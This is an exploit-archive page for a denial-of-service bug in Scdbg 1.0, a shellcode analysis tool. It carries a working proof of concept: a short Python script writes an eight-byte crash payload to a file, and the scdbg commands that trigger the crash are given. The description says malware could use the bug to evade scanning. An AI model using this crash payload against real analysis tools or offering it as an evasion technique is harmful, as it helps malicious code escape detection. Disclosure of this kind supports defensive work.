Scdbg 1.0 buffer overflow dos Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-27 |
Type : dos |
Platform : windows
This exploit / vulnerability Scdbg 1.0 buffer overflow dos is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Scdbg 1.0 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-06-13
# Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152
# Software Link : https://github.com/dzzie/VS_LIBEMU
# Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45
# Tested on: Windows 7, 10
Vulnerability description: scdbg.exe (all versions) is affected by a Denial
of Service vulnerability that occurs when you use the /foff parameter or
not with a specific shellcode causing it to shutdown. Any malware could use
this option to evade the scan.
Proof of concept:
Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f
scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin
#!/usr/bin/env python
crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"
f = open ("scdbg_crash.bin", "w")
f.write(crash)
f.close()
You can use gui_launcher.exe and check "Start offset 0x": 1 or directly
without check